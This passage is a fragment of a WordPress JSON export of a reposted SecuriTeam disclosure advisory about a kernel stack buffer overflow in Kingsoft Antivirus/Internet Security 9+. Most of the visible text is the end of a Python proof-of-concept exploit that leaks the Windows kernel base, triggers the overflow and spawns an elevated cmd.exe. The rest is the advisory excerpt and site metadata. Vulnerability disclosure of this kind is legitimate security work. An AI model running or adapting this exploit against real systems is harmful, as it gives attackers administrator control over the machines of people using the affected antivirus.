id=\"crayon-5a42caec3600a215264132-161\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">szDriver<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-162\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cb<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">lpImageBase<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-163\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">lpcbNeeded<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_long<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-164\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-165\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">windll<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">psapi<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">EnumDeviceDrivers<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">lpImageBase<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-166\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">lpImageBase<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-167\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">lpcbNeeded<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-168\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-169\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;(-) unable to get kernel base: &quot;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">FormatError<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-170\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-171\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-172\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># nt is the first one<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-173\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">nt<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lpImageBase<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00000000ffffffff<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-174\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-175\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-176\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-177\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\n\\t--[ Kingsoft Internet Security Kernel Stack Overflow EoP Exploit ]&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-178\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Steven Seeley (mr_me) of Source Incite\\r\\n&quot;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-179\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">we_can_leak_the_base<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-180\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;(+) found nt base at 0x%08x&quot;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">nt<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-181\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">we_can_trigger_overflow<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-182\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;cmd.exe&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-183\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-184\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;(-) it appears that kingsoft Internet Security is not installed!&quot;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-185\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__name__<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'__main__'<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-186\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3597\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 26 Dec 2017 10:03:53 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a kernel stack buffer overflow that leads to privilege escalation found in Kingsoft Antivirus\/Internet Security 9+. Kingsoft Antivirus &#8220;provides effective and efficient protection solution at no cost to users. It applies cloud security technology to monitor, scan and protect your systems without any worrying. The comprehensive defender and anti-virus &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3597\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Kingsoft Antivirus\/Internet Security 9+ Privilege 
Escalation<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12033,11946,10757],"class_list":["post-10951","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-buffer-overflow","tag-privilege-escalation","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10951","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10951"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10951\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10951"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10951"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10951"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}